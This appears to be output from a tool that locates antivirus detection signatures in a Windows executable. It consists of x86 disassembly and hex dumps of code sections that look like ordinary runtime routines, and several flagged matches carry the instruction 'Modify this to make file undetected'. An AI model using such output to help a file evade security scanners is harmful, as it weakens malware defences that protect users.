0x6ed7: 0x00407ad7 d1f9 sar ecx, 1
0x6ed9: 0x00407ad9 3bca cmp ecx, edx
0x6edb: < 0x00407adb 756b jne 0x407b48
0x6edd: 0x00407add 8b450c mov eax, dword [arg_ch]
0x6ee0: 0x00407ae0 8d3c4e lea edi, [esi + ecx*2]
0x6ee3: 0x00407ae3 2bc2 sub eax, edx
0x6ee5: 0x00407ae5 0f57c9 xorps xmm1, xmm1
0x6ee8: 0x00407ae8 83e0f0 and eax, 0xfffffff0 ; 4294967280
0x6eeb: 0x00407aeb 03c1 add eax, ecx
0x6eed: 0x00407aed 8d0c46 lea ecx, [esi + eax*2]
0x6ef0: < 0x00407af0 eb12 jmp 0x407b04
0x6ef2: ; CODE XREF from fcn.0040799e @ 0x407b06(x)
0x6ef2: > 0x00407af2 0f1007 movups xmm0, xmmword [edi]
0x6ef5: 0x00407af5 660f75c1 pcmpeqw xmm0, xmm1
0x6ef9: 0x00407af9 660fd7c0 pmovmskb eax, xmm0
0x6efd: 0x00407afd 85c0 test eax, eax
0x6eff: < 0x00407aff 7507 jne 0x407b08
0x6f01: 0x00407b01 83c710 add edi, 0x10 ; 16
0x6f04: ; CODE XREF from fcn.0040799e @ 0x407af0(x)
0x6f04: > 0x00407b04 3bf9 cmp edi, ecx
0x6f06: < 0x00407b06 75ea jne 0x407af2
0x6f08: ; CODE XREF from fcn.0040799e @ 0x407aff(x)
0x6f08: > 0x00407b08 8b450c mov eax, dword [arg_ch]
0x6f0b: 0x00407b0b 8d0c46 lea ecx, [esi + eax*2]
0x6f0e: 0x00407b0e 3bf9 cmp edi, ecx
0x6f10: < 0x00407b10 740e je 0x407b20
0x6f12: 0x00407b12 33c0 xor eax, eax
0x6f14: ; CODE XREF from fcn.0040799e @ 0x407b1e(x)
0x6f14: > 0x00407b14 663907 cmp word [edi], ax
0x6f17: < 0x00407b17 7407 je 0x407b20
0x6f19: 0x00407b19 83c702 add edi, 2
0x6f1c: 0x00407b1c 3bf9 cmp edi, ecx
0x6f1e: < 0x00407b1e 75f4 jne 0x407b14
0x6f20: ; CODE XREFS from fcn.0040799e @ 0x407b10(x), 0x407b17(x)
0x6f20: > 0x00407b20 8bcf mov ecx, edi
0x6f22: < 0x00407b22 e9aefeffff jmp 0x4079d5
0x6f27: ; CODE XREF from fcn.0040799e @ 0x407a6d(x)
0x6f27: 0x00407b27 8b5508 mov edx, dword [arg_8h]
0x6f2a: 0x00407b2a 8bca mov ecx, edx
0x6f2c: 0x00407b2c 8b450c mov eax, dword [arg_ch]
0x6f2f: 0x00407b2f 8d3442 lea esi, [edx + eax*2]
0x6f32: 0x00407b32 3bd6 cmp edx, esi
0x6f34: < 0x00407b34 740e je 0x407b44
0x6f36: 0x00407b36 33c0 xor eax, eax
0x6f38: ; CODE XREF from fcn.0040799e @ 0x407b42(x)
0x6f38: > 0x00407b38 663901 cmp word [ecx], ax
0x6f3b: < 0x00407b3b 7407 je 0x407b44
0x6f3d: 0x00407b3d 83c102 add ecx, 2
0x6f40: 0x00407b40 3bce cmp ecx, esi
0x6f42: < 0x00407b42 75f4 jne 0x407b38
0x6f44: ; CODE XREFS from fcn.0040799e @ 0x407b34(x), 0x407b3b(x)
0x6f44: > 0x00407b44 2bca sub ecx, edx
0x6f46: ; CODE XREF from fcn.0040799e @ 0x4079d7(x)
0x6f46: 0x00407b46 d1f9 sar ecx, 1
0x6f48: ; CODE XREFS from fcn.0040799e @ 0x407a15(x), 0x407a65(x), 0x407adb(x)
0x6f48: > 0x00407b48 5f pop edi
0x6f49: 0x00407b49 8bc1 mov eax, ecx
0x6f4b: 0x00407b4b 5e pop esi
0x6f4c: 0x00407b4c 5d pop ebp
0x6f4d: 0x00407b4d c3 ret
0x6f4e: ; CALL XREF from fcn.00407cba @ 0x407d23(x)
0x6f4e: 70: fcn.00407b4e (int32_t arg_8h, int32_t arg_ch);
0x6f4e: ; arg int32_t arg_8h @ ebp+0x8
0x6f4e: ; arg int32_t arg_ch @ ebp+0xc
0x6f4e: ; var int32_t var_4h @ ebp-0x4
0x6f4e: ; var int32_t var_10h @ ebp-0x10
0x6f4e: 0x00407b4e 6a08 push 8 ; 8
0x6f50: 0x00407b50 68c8904100 push 0x4190c8
0x6f55: 0x00407b55 e896a4ffff call fcn.00401ff0
0x6f5a: 0x00407b5a 8b4508 mov eax, dword [arg_8h]
0x6f5d: 0x00407b5d ff30 push dword [eax]
0x6f5f: 0x00407b5f e888270000 call fcn.0040a2ec
0x6f64: 0x00407b64 59 pop ecx
0x6f65: 0x00407b65 8365fc00 and dword [var_4h], 0
0x6f69: 0x00407b69 8b450c mov eax, dword [arg_ch]
0x6f6c: 0x00407b6c 8b00 mov eax, dword [eax]
0x6f6e: 0x00407b6e 8b00 mov eax, dword [eax]
0x6f70: 0x00407b70 8b4048 mov eax, dword [eax + 0x48]
0x6f73: 0x00407b73 f0ff00 lock inc dword [eax]
0x6f76: 0x00407b76 c745fcfeffff. mov dword [var_4h], 0xfffffffe ; 4294967294
0x6f7d: 0x00407b7d e812000000 call fcn.00407b94
0x6f82: 0x00407b82 8b4df0 mov ecx, dword [var_10h]
0x6f85: 0x00407b85 64890d000000. mov dword fs:[0], ecx
0x6f8c: 0x00407b8c 59 pop ecx
0x6f8d: 0x00407b8d 5f pop edi
0x6f8e: 0x00407b8e 5e pop esi
0x6f8f: 0x00407b8f 5b pop ebx
0x6f90: 0x00407b90 c9 leave
0x6f91: 0x00407b91 c20c00 ret 0xc
0x6f94: ; CALL XREF from fcn.00407b4e @ 0x407b7d(x)
0x6f94: 12: fcn.00407b94 (int32_t arg_10h);
0x6f94: ; arg int32_t arg_10h @ ebp+0x10
0x6f94: 0x00407b94 8b4510 mov eax, dword [arg_10h]
0x6f97: 0x00407b97 ff30 push dword [eax]
0x6f99: 0x00407b99 e896270000 call fcn.0040a334
0x6f9e: 0x00407b9e 59 pop ecx
0x6f9f: 0x00407b9f c3 ret
0x6fa0: ; CALL XREF from fcn.00407d74 @ 0x407e17(x)
0x6fa0: 95: fcn.00407ba0 (int32_t arg_8h, int32_t arg_ch);
0x6fa0: ; arg int32_t arg_8h @ ebp+0x8
0x6fa0: ; arg int32_t arg_ch @ ebp+0xc
0x6fa0: ; var int32_t var_4h @ ebp-0x4
0x6fa0: ; var int32_t var_10h @ ebp-0x10
0x6fa0: 0x00407ba0 6a08 push 8 ; 8
0x6fa2: 0x00407ba2 6808914100 push 0x419108
0x6fa7: 0x00407ba7 e844a4ffff call fcn.00401ff0
0x6fac: 0x00407bac 8b4508 mov eax, dword [arg_8h]
0x6faf: 0x00407baf ff30 push dword [eax]
0x6fb1: 0x00407bb1 e836270000 call fcn.0040a2ec
0x6fb6: 0x00407bb6 59 pop ecx
0x6fb7: 0x00407bb7 8365fc00 and dword [var_4h], 0
0x6fbb: 0x00407bbb 8b450c mov eax, dword [arg_ch]
0x6fbe: 0x00407bbe 8b00 mov eax, dword [eax]
0x6fc0: 0x00407bc0 8b00 mov eax, dword [eax]
0x6fc2: 0x00407bc2 8b4848 mov ecx, dword [eax + 0x48]
0x6fc5: 0x00407bc5 85c9 test ecx, ecx
0x6fc7: < 0x00407bc7 7418 je 0x407be1
0x6fc9: 0x00407bc9 83c8ff or eax, 0xffffffff ; -1
0x6fcc: 0x00407bcc f00fc101 lock xadd dword [ecx], eax
0x6fd0: < 0x00407bd0 750f jne 0x407be1
0x6fd2: 0x00407bd2 81f900a24100 cmp ecx, 0x41a200
0x6fd8: < 0x00407bd8 7407 je 0x407be1
0x6fda: 0x00407bda 51 push ecx
0x6fdb: 0x00407bdb e83bf0ffff call fcn.00406c1b
0x6fe0: 0x00407be0 59 pop ecx
0x6fe1: ; CODE XREFS from fcn.00407ba0 @ 0x407bc7(x), 0x407bd0(x), 0x407bd8(x)
0x6fe1: > 0x00407be1 c745fcfeffff. mov dword [var_4h], 0xfffffffe ; 4294967294

Match 50: 28768 (size: 272)

Dominant. Modify this to make file undetected

.text

00007060   6A 08 68 E8 90 41 00 E8 84 A3 FF FF 8B 45 08 FF    j.h..A.......E..
00007070   30 E8 76 26 00 00 59 83 65 FC 00 8B 4D 0C 8B 41    0.v&..Y.e...M..A
00007080   04 8B 00 FF 30 8B 01 FF 30 E8 B3 01 00 00 59 59    ....0...0.....YY
00007090   C7 45 FC FE FF FF FF E8 12 00 00 00 8B 4D F0 64    .E...........M.d
000070A0   89 0D 00 00 00 00 59 5F 5E 5B C9 C2 0C 00 8B 45    ......Y_^[.....E
000070B0   10 FF 30 E8 7C 26 00 00 59 C3 8B FF 55 8B EC 83    ..0.|&..Y...U...
000070C0   EC 14 8B 45 08 33 C9 41 6A 43 89 48 18 8B 45 08    ...E.3.AjC.H..E.
000070D0   C7 00 50 30 41 00 8B 45 08 89 88 50 03 00 00 8B    ..P0A..E...P....
000070E0   45 08 59 6A 05 C7 40 48 00 A2 41 00 8B 45 08 66    E.Yj..@H..A..E.f
000070F0   89 48 6C 8B 45 08 66 89 88 72 01 00 00 8D 4D FF    .Hl.E.f..r....M.
00007100   8B 45 08 83 A0 4C 03 00 00 00 8D 45 08 89 45 F0    .E...L.....E..E.
00007110   58 89 45 F8 89 45 EC 8D 45 F8 50 8D 45 F0 50 8D    X.E..E..E.P.E.P.
00007120   45 EC 50 E8 26 FE FF FF 8D 45 08 89 45 F4 8D 4D    E.P.&....E..E..M
00007130   FF 6A 04 8D 45 0C 89 45 F8 58 89 45 EC 89 45 F0    .j..E..E.X.E..E.
00007140   8D 45 EC 50 8D 45 F4 50 8D 45 F0 50 E8 0F FF FF    .E.P.E.P.E.P....
00007150   FF C9 C3 8B FF 55 8B EC 83 7D 08 00 74 12 FF 75    .....U...}..t..u
00007160   08 E8 0E 00 00 00 FF 75 08 E8 AD EE FF FF 59 59    .......u......YY

0x7050: 0x00407c50 c9 leave
0x7051: 0x00407c51 c20c00 ret 0xc
0x7054: ; CALL XREF from fcn.00407c0b @ 0x407c3d(x)
0x7054: 12: fcn.00407c54 (int32_t arg_10h);
0x7054: ; arg int32_t arg_10h @ ebp+0x10
0x7054: 0x00407c54 8b4510 mov eax, dword [arg_10h]
0x7057: 0x00407c57 ff30 push dword [eax]
0x7059: 0x00407c59 e8d6260000 call fcn.0040a334
0x705e: 0x00407c5e 59 pop ecx
0x705f: 0x00407c5f c3 ret
0x7060: ; CALL XREF from fcn.00407cba @ 0x407d4c(x)
0x7060: 78: fcn.00407c60 (int32_t arg_8h, int32_t arg_ch);
0x7060: ; arg int32_t arg_8h @ ebp+0x8
0x7060: ; arg int32_t arg_ch @ ebp+0xc
0x7060: ; var int32_t var_4h @ ebp-0x4
0x7060: ; var int32_t var_10h @ ebp-0x10
0x7060: 0x00407c60 6a08 push 8 ; 8
0x7062: 0x00407c62 68e8904100 push 0x4190e8
0x7067: 0x00407c67 e884a3ffff call fcn.00401ff0
0x706c: 0x00407c6c 8b4508 mov eax, dword [arg_8h]
0x706f: 0x00407c6f ff30 push dword [eax]
0x7071: 0x00407c71 e876260000 call fcn.0040a2ec
0x7076: 0x00407c76 59 pop ecx
0x7077: 0x00407c77 8365fc00 and dword [var_4h], 0
0x707b: 0x00407c7b 8b4d0c mov ecx, dword [arg_ch]
0x707e: 0x00407c7e 8b4104 mov eax, dword [ecx + 4]
0x7081: 0x00407c81 8b00 mov eax, dword [eax]
0x7083: 0x00407c83 ff30 push dword [eax]
0x7085: 0x00407c85 8b01 mov eax, dword [ecx]
0x7087: 0x00407c87 ff30 push dword [eax]
0x7089: 0x00407c89 e8b3010000 call fcn.00407e41
0x708e: 0x00407c8e 59 pop ecx
0x708f: 0x00407c8f 59 pop ecx
0x7090: 0x00407c90 c745fcfeffff. mov dword [var_4h], 0xfffffffe ; 4294967294
0x7097: 0x00407c97 e812000000 call fcn.00407cae
0x709c: 0x00407c9c 8b4df0 mov ecx, dword [var_10h]
0x709f: 0x00407c9f 64890d000000. mov dword fs:[0], ecx
0x70a6: 0x00407ca6 59 pop ecx
0x70a7: 0x00407ca7 5f pop edi
0x70a8: 0x00407ca8 5e pop esi
0x70a9: 0x00407ca9 5b pop ebx
0x70aa: 0x00407caa c9 leave
0x70ab: 0x00407cab c20c00 ret 0xc
0x70ae: ; CALL XREF from fcn.00407c60 @ 0x407c97(x)
0x70ae: 12: fcn.00407cae (int32_t arg_10h);
0x70ae: ; arg int32_t arg_10h @ ebp+0x10
0x70ae: 0x00407cae 8b4510 mov eax, dword [arg_10h]
0x70b1: 0x00407cb1 ff30 push dword [eax]
0x70b3: 0x00407cb3 e87c260000 call fcn.0040a334
0x70b8: 0x00407cb8 59 pop ecx
0x70b9: 0x00407cb9 c3 ret
0x70ba: ; CALL XREF from fcn.00407e8c @ 0x407f1d(x)
0x70ba: ; CALL XREF from fcn.00407f49 @ 0x407fc6(x)
0x70ba: ; CALL XREF from fcn.00407fe3 @ 0x408074(x)
0x70ba: 153: fcn.00407cba (int32_t arg_8h, int32_t arg_ch);
0x70ba: ; arg int32_t arg_8h @ ebp+0x8
0x70ba: ; arg int32_t arg_ch @ ebp+0xc
0x70ba: ; var int32_t var_1h @ ebp-0x1
0x70ba: ; var int32_t var_8h @ ebp-0x8
0x70ba: ; var int32_t var_ch @ ebp-0xc
0x70ba: ; var int32_t var_10h @ ebp-0x10
0x70ba: ; var int32_t var_14h @ ebp-0x14
0x70ba: 0x00407cba 8bff mov edi, edi
0x70bc: 0x00407cbc 55 push ebp
0x70bd: 0x00407cbd 8bec mov ebp, esp
0x70bf: 0x00407cbf 83ec14 sub esp, 0x14
0x70c2: 0x00407cc2 8b4508 mov eax, dword [arg_8h]
0x70c5: 0x00407cc5 33c9 xor ecx, ecx
0x70c7: 0x00407cc7 41 inc ecx
0x70c8: 0x00407cc8 6a43 push 0x43 ; 'C' ; 67
0x70ca: 0x00407cca 894818 mov dword [eax + 0x18], ecx
0x70cd: 0x00407ccd 8b4508 mov eax, dword [arg_8h]
0x70d0: 0x00407cd0 c70050304100 mov dword [eax], 0x413050 ; 'P0A'
0x70d0: ; [0x413050:4]=0xc0000005
0x70d6: 0x00407cd6 8b4508 mov eax, dword [arg_8h]
0x70d9: 0x00407cd9 898850030000 mov dword [eax + 0x350], ecx
0x70df: 0x00407cdf 8b4508 mov eax, dword [arg_8h]
0x70e2: 0x00407ce2 59 pop ecx
0x70e3: 0x00407ce3 6a05 push 5 ; 5
0x70e5: 0x00407ce5 c7404800a241. mov dword [eax + 0x48], 0x41a200 ; [0x41a200:4]=0
0x70ec: 0x00407cec 8b4508 mov eax, dword [arg_8h]
0x70ef: 0x00407cef 6689486c mov word [eax + 0x6c], cx
0x70f3: 0x00407cf3 8b4508 mov eax, dword [arg_8h]
0x70f6: 0x00407cf6 668988720100. mov word [eax + 0x172], cx
0x70fd: 0x00407cfd 8d4dff lea ecx, [var_1h]
0x7100: 0x00407d00 8b4508 mov eax, dword [arg_8h]
0x7103: 0x00407d03 83a04c030000. and dword [eax + 0x34c], 0
0x710a: 0x00407d0a 8d4508 lea eax, [arg_8h]
0x710d: 0x00407d0d 8945f0 mov dword [var_10h], eax
0x7110: 0x00407d10 58 pop eax
0x7111: 0x00407d11 8945f8 mov dword [var_8h], eax
0x7114: 0x00407d14 8945ec mov dword [var_14h], eax
0x7117: 0x00407d17 8d45f8 lea eax, [var_8h]
0x711a: 0x00407d1a 50 push eax
0x711b: 0x00407d1b 8d45f0 lea eax, [var_10h]
0x711e: 0x00407d1e 50 push eax
0x711f: 0x00407d1f 8d45ec lea eax, [var_14h]
0x7122: 0x00407d22 50 push eax
0x7123: 0x00407d23 e826feffff call fcn.00407b4e
0x7128: 0x00407d28 8d4508 lea eax, [arg_8h]
0x712b: 0x00407d2b 8945f4 mov dword [var_ch], eax
0x712e: 0x00407d2e 8d4dff lea ecx, [var_1h]
0x7131: 0x00407d31 6a04 push 4 ; 4
0x7133: 0x00407d33 8d450c lea eax, [arg_ch]
0x7136: 0x00407d36 8945f8 mov dword [var_8h], eax
0x7139: 0x00407d39 58 pop eax
0x713a: 0x00407d3a 8945ec mov dword [var_14h], eax
0x713d: 0x00407d3d 8945f0 mov dword [var_10h], eax
0x7140: 0x00407d40 8d45ec lea eax, [var_14h]
0x7143: 0x00407d43 50 push eax
0x7144: 0x00407d44 8d45f4 lea eax, [var_ch]
0x7147: 0x00407d47 50 push eax
0x7148: 0x00407d48 8d45f0 lea eax, [var_10h]
0x714b: 0x00407d4b 50 push eax
0x714c: 0x00407d4c e80fffffff call fcn.00407c60
0x7151: 0x00407d51 c9 leave
0x7152: 0x00407d52 c3 ret
0x7153: ; DATA XREF from fcn.00407fe3 @ +0xb5(r)
0x7153: 0x00407d53 8bff mov edi, edi
0x7155: 0x00407d55 55 push ebp
0x7156: 0x00407d56 8bec mov ebp, esp
0x7158: 0x00407d58 837d0800 cmp dword [ebp + 8], 0
0x715c: < 0x00407d5c 7412 je 0x407d70
0x715e: 0x00407d5e ff7508 push dword [ebp + 8]
0x7161: 0x00407d61 e80e000000 call fcn.00407d74
0x7166: 0x00407d66 ff7508 push dword [ebp + 8]
0x7169: 0x00407d69 e8adeeffff call fcn.00406c1b
0x716e: 0x00407d6e 59 pop ecx
0x716f: 0x00407d6f 59 pop ecx
0x7170: ; CODE XREF from fcn.00407cba @ +0xa2(x)
0x7170: > 0x00407d70 5d pop ebp
0x7171: 0x00407d71 c20400 ret 4
0x7174: ; CALL XREF from fcn.00407cba @ +0xa7(x)
0x7174: 205: fcn.00407d74 (int32_t arg_8h);
0x7174: ; arg int32_t arg_8h @ ebp+0x8
0x7174: ; var int32_t var_1h @ ebp-0x1
0x7174: ; var int32_t var_8h @ ebp-0x8
0x7174: ; var int32_t var_ch @ ebp-0xc
0x7174: ; var int32_t var_10h @ ebp-0x10
0x7174: 0x00407d74 8bff mov edi, edi
0x7176: 0x00407d76 55 push ebp
0x7177: 0x00407d77 8bec mov ebp, esp
0x7179: 0x00407d79 8b4508 mov eax, dword [arg_8h]
0x717c: 0x00407d7c 83ec10 sub esp, 0x10
0x717f: 0x00407d7f 8b invalid

Match 51: 29176 (size: 816)

Dominant. Modify this to make file undetected

.text

000071F8   24 8D 45 08 89 45 F4 8D 4D FF 6A 05 58 89 45 F8    $.E..E..M.j.X.E.
00007208   89 45 F0 8D 45 F8 50 8D 45 F4 50 8D 45 F0 50 E8    .E..E.P.E.P.E.P.
00007218   84 FD FF FF 6A 04 8D 45 08 89 45 F4 8D 4D FF 58    ....j..E..E..M.X
00007228   89 45 F0 89 45 F8 8D 45 F0 50 8D 45 F4 50 8D 45    .E..E..E.P.E.P.E
00007238   F8 50 E8 CC FD FF FF C9 C3 8B FF 55 8B EC 56 8B    .P.........U..V.
00007248   75 08 83 7E 4C 00 74 28 FF 76 4C E8 29 2E 00 00    u..~L.t(.vL.)...
00007258   8B 46 4C 59 3B 05 38 B2 41 00 74 14 3D 38 A1 41    .FLY;.8.A.t.=8.A
00007268   00 74 0D 83 78 0C 00 75 07 50 E8 3F 2C 00 00 59    .t..x..u.P.?,..Y
00007278   8B 45 0C 89 46 4C 5E 85 C0 74 07 50 E8 B0 2B 00    .E..FL^..t.P..+.
00007288   00 59 5D C3 8B FF 53 56 57 FF 15 48 20 41 00 8B    .Y]...SVW..H A..
00007298   F0 A1 30 A1 41 00 83 F8 FF 74 1C 50 E8 5F F0 FF    ..0.A....t.P._..
000072A8   FF 8B F8 85 FF 74 0B 83 FF FF 75 78 33 DB 8B FB    .....t....ux3...
000072B8   EB 74 A1 30 A1 41 00 6A FF 50 E8 80 F0 FF FF 85    .t.0.A.j.P......
000072C8   C0 74 E9 68 64 03 00 00 6A 01 E8 E7 EC FF FF 8B    .t.hd...j.......
000072D8   F8 59 59 85 FF 75 17 33 DB 53 FF 35 30 A1 41 00    .YY..u.3.S.50.A.
000072E8   E8 5A F0 FF FF 53 E8 28 ED FF FF 59 EB C0 57 FF    .Z...S.(...Y..W.
000072F8   35 30 A1 41 00 E8 45 F0 FF FF 85 C0 75 11 33 DB    50.A..E.....u.3.
00007308   53 FF 35 30 A1 41 00 E8 33 F0 FF FF 57 EB D7 68    S.50.A..3...W..h
00007318   38 B2 41 00 57 E8 98 FD FF FF 6A 00 E8 F2 EC FF    8.A.W.....j.....
00007328   FF 83 C4 0C 8B DF 56 FF 15 4C 20 41 00 F7 DF 1B    ......V..L A....
00007338   FF 23 FB 74 06 8B C7 5F 5E 5B C3 E8 92 E2 FF FF    .#.t..._^[......
00007348   CC A1 30 A1 41 00 56 83 F8 FF 74 18 50 E8 AE EF    ..0.A.V...t.P...
00007358   FF FF 8B F0 85 F6 74 07 83 FE FF 74 78 EB 6E A1    ......t....tx.n.
00007368   30 A1 41 00 6A FF 50 E8 D3 EF FF FF 85 C0 74 65    0.A.j.P.......te
00007378   68 64 03 00 00 6A 01 E8 3A EC FF FF 8B F0 59 59    hd...j..:.....YY
00007388   85 F6 75 15 50 FF 35 30 A1 41 00 E8 AF EF FF FF    ..u.P.50.A......
00007398   56 E8 7D EC FF FF 59 EB 3C 56 FF 35 30 A1 41 00    V.}...Y.<V.50.A.
000073A8   E8 9A EF FF FF 85 C0 75 0F 50 FF 35 30 A1 41 00    .......u.P.50.A.
000073B8   E8 8A EF FF FF 56 EB D9 68 38 B2 41 00 56 E8 EF    .....V..h8.A.V..
000073C8   FC FF FF 6A 00 E8 49 EC FF FF 83 C4 0C 85 F6 74    ...j..I........t
000073D8   04 8B C6 5E C3 E8 F8 E1 FF FF CC 8B FF 53 56 57    ...^.........SVW
000073E8   FF 15 48 20 41 00 8B F0 A1 30 A1 41 00 83 F8 FF    ..H A....0.A....
000073F8   74 1C 50 E8 08 EF FF FF 8B F8 85 FF 74 0B 83 FF    t.P.........t...
00007408   FF 75 78 33 DB 8B FB EB 74 A1 30 A1 41 00 6A FF    .ux3....t.0.A.j.
00007418   50 E8 29 EF FF FF 85 C0 74 E9 68 64 03 00 00 6A    P.).....t.hd...j
00007428   01 E8 90 EB FF FF 8B F8 59 59 85 FF 75 17 33 DB    ........YY..u.3.
00007438   53 FF 35 30 A1 41 00 E8 03 EF FF FF 53 E8 D1 EB    S.50.A......S...
00007448   FF FF 59 EB C0 57 FF 35 30 A1 41 00 E8 EE EE FF    ..Y..W.50.A.....
00007458   FF 85 C0 75 11 33 DB 53 FF 35 30 A1 41 00 E8 DC    ...u.3.S.50.A...
00007468   EE FF FF 57 EB D7 68 38 B2 41 00 57 E8 41 FC FF    ...W..h8.A.W.A..
00007478   FF 6A 00 E8 9B EB FF FF 83 C4 0C 8B DF 56 FF 15    .j...........V..
00007488   4C 20 41 00 F7 DF 1B FF 23 FB 8B C7 5F 5E 5B C3    L A.....#..._^[.
00007498   68 53 7D 40 00 E8 E8 ED FF FF A3 30 A1 41 00 83    hS}@.......0.A..
000074A8   F8 FF 75 03 32 C0 C3 E8 2F FF FF FF 85 C0 75 09    ..u.2.../.....u.
000074B8   50 E8 06 00 00 00 59 EB EB B0 01 C3 A1 30 A1 41    P.....Y......0.A
000074C8   00 83 F8 FF 74 0D 50 E8 F5 ED FF FF 83 0D 30 A1    ....t.P.......0.
000074D8   41 00 FF B0 01 C3 8B FF 55 8B EC 56 8B 75 0C 8B    A.......U..V.u..
000074E8   06 3B 05 38 B2 41 00 74 17 8B 4D 08 A1 80 A7 41    .;.8.A.t..M....A
000074F8   00 85 81 50 03 00 00 75 07 E8 FC 2B 00 00 89 06    ...P...u...+....
00007508   5E 5D C3 8B FF 55 8B EC 56 8B 75 0C 8B 06 3B 05    ^]...U..V.u...;.
00007518   44 B2 41 00 74 17 8B 4D 08 A1 80 A7 41 00 85 81    D.A.t..M....A...

Match 52: 32848 (size: 952)

Dominant. Modify this to make file undetected

.text

00008050   40 08 FE 79 11 FF 75 0C 0F B7 45 08 50 E8 18 5A    @..y..u...E.P..Z
00008060   00 00 59 59 5D C3 8B 55 0C 66 8B 45 08 8B 0A 66    ..YY]..U.f.E...f
00008070   89 01 83 02 02 5D C3 8B FF 55 8B EC 83 EC 10 A1    .....]...U......
00008080   04 A0 41 00 33 C5 89 45 FC 57 8B 7D 0C 8B 47 0C    ..A.3..E.W.}..G.
00008090   90 C1 E8 0C A8 01 74 10 57 FF 75 08 E8 A6 FF FF    ......t.W.u.....
000080A0   FF 59 59 E9 EB 00 00 00 53 56 57 E8 F0 00 00 00    .YY.....SVW.....
000080B0   BB F8 A0 41 00 59 83 F8 FF 74 30 57 E8 DF 00 00    ...A.Y...t0W....
000080C0   00 59 83 F8 FE 74 24 57 E8 D3 00 00 00 8B F0 57    .Y...t$W.......W
000080D0   C1 FE 06 E8 C8 00 00 00 59 83 E0 3F 59 6B C8 38    ........Y..?Yk.8
000080E0   8B 04 B5 20 B0 41 00 03 C1 EB 02 8B C3 8A 40 29    ... .A........@)
000080F0   3C 02 0F 84 8E 00 00 00 3C 01 0F 84 86 00 00 00    <.......<.......
00008100   57 E8 9A 00 00 00 59 83 F8 FF 74 2E 57 E8 8E 00    W.....Y...t.W...
00008110   00 00 59 83 F8 FE 74 22 57 E8 82 00 00 00 8B F0    ..Y...t"W.......
00008120   57 C1 FE 06 E8 77 00 00 00 8B 1C B5 20 B0 41 00    W....w...... .A.
00008130   83 E0 3F 59 59 6B C8 38 03 D9 80 7B 28 00 7D 46    ..?YYk.8...{(.}F
00008140   FF 75 08 8D 45 F4 6A 05 50 8D 45 F0 50 E8 2F EC    .u..E.j.P.E.P./.
00008150   FF FF 83 C4 10 85 C0 75 26 33 F6 39 75 F0 7E 19    .......u&3.9u.~.
00008160   0F BE 44 35 F4 57 50 E8 5B 00 00 00 59 59 83 F8    ..D5.WP.[...YY..
00008170   FF 74 0C 46 3B 75 F0 7C E7 66 8B 45 08 EB 12 B8    .t.F;u.|.f.E....
00008180   FF FF 00 00 EB 0B 57 FF 75 08 E8 B8 FE FF FF 59    ......W.u......Y
00008190   59 5E 5B 8B 4D FC 33 CD 5F E8 3B 89 FF FF C9 C3    Y^[.M.3._.;.....
000081A0   8B FF 55 8B EC 8B 45 08 85 C0 75 15 E8 FA DD FF    ..U...E...u.....
000081B0   FF C7 00 16 00 00 00 E8 32 DD FF FF 83 C8 FF 5D    ........2......]
000081C0   C3 8B 40 10 90 5D C3 8B FF 55 8B EC 8B 55 0C 83    ..@..]...U...U..
000081D0   6A 08 01 79 0D 52 FF 75 08 E8 91 58 00 00 59 59    j..y.R.u...X..YY
000081E0   5D C3 8B 02 8A 4D 08 88 08 FF 02 0F B6 C1 5D C3    ]....M........].
000081F0   8B 0D 04 A0 41 00 33 C0 83 C9 01 39 0D 2C B2 41    ....A.3....9.,.A
00008200   00 0F 94 C0 C3 8B FF 55 8B EC 6A 02 E8 F7 A3 FF    .......U..j.....
00008210   FF 59 39 45 08 74 25 6A 01 E8 EA A3 FF FF 59 39    .Y9E.t%j......Y9
00008220   45 08 75 14 FF 75 08 E8 74 FF FF FF 50 E8 53 58    E.u..u..t...P.SX
00008230   00 00 59 59 85 C0 75 04 32 C0 5D C3 B0 01 5D C3    ..YY..u.2.]...].
00008240   8B FF 55 8B EC 53 56 8B 75 08 57 56 E8 B4 FF FF    ..U..SV.u.WV....
00008250   FF 59 84 C0 0F 84 8B 00 00 00 6A 01 E8 A7 A3 FF    .Y........j.....
00008260   FF 59 6A 02 5B 3B F0 75 07 BF 30 B2 41 00 EB 10    .Yj.[;.u..0.A...
00008270   53 E8 92 A3 FF FF 59 3B F0 75 6A BF 34 B2 41 00    S.....Y;.uj.4.A.
00008280   FF 05 D0 AC 41 00 8D 4E 0C 8B 01 90 A9 C0 04 00    ....A..N........
00008290   00 75 52 B8 82 02 00 00 F0 09 01 8B 07 85 C0 75    .uR............u
000082A0   2D 68 00 10 00 00 E8 8C E7 FF FF 6A 00 89 07 E8    -h.........j....
000082B0   67 DD FF FF 8B 07 59 59 85 C0 75 12 8D 4E 14 89    g.....YY..u..N..
000082C0   5E 08 89 4E 04 89 0E 89 5E 18 B0 01 EB 19 89 46    ^..N....^......F
000082D0   04 8B 07 89 06 C7 46 08 00 10 00 00 C7 46 18 00    ......F......F..
000082E0   10 00 00 EB E5 32 C0 5F 5E 5B 5D C3 8B FF 55 8B    .....2._^[]...U.
000082F0   EC 80 7D 08 00 74 2D 56 8B 75 0C 57 8D 7E 0C 8B    ..}..t-V.u.W.~..
00008300   07 90 C1 E8 09 A8 01 74 19 56 E8 3C E4 FF FF 59    .......t.V.<...Y
00008310   B8 7F FD FF FF F0 21 07 33 C0 89 46 18 89 46 04    ......!.3..F..F.
00008320   89 06 5F 5E 5D C3 8B FF 55 8B EC 8B 55 08 56 85    .._^]...U...U.V.
00008330   D2 74 13 8B 4D 0C 85 C9 74 0C 8B 75 10 85 F6 75    .t..M...t..u...u
00008340   19 33 C0 66 89 02 E8 60 DC FF FF 6A 16 5E 89 30    .3.f...`...j.^.0
00008350   E8 99 DB FF FF 8B C6 5E 5D C3 57 8B FA 2B F2 0F    .......^].W..+..
00008360   B7 04 3E 66 89 07 8D 7F 02 66 85 C0 74 05 83 E9    ..>f.....f..t...
00008370   01 75 EC 5F 85 C9 75 0E 33 C0 66 89 02 E8 29 DC    .u._..u.3.f...).
00008380   FF FF 6A 22 EB C7 33 F6 EB CB 8B FF 55 8B EC 8B    ..j"..3.....U...
00008390   4D 08 53 8B 5D 10 56 8B 75 14 85 F6 75 1E 85 C9    M.S.].V.u...u...
000083A0   75 1E 39 75 0C 74 29 E8 FF DB FF FF 6A 16 5E 89    u.9u.t).....j.^.
000083B0   30 E8 38 DB FF FF 8B C6 5E 5B 5D C3 85 C9 74 E7    0.8.....^[]...t.
000083C0   8B 45 0C 85 C0 74 E0 85 F6 75 09 33 C0 66 89 01    .E...t...u.3.f..
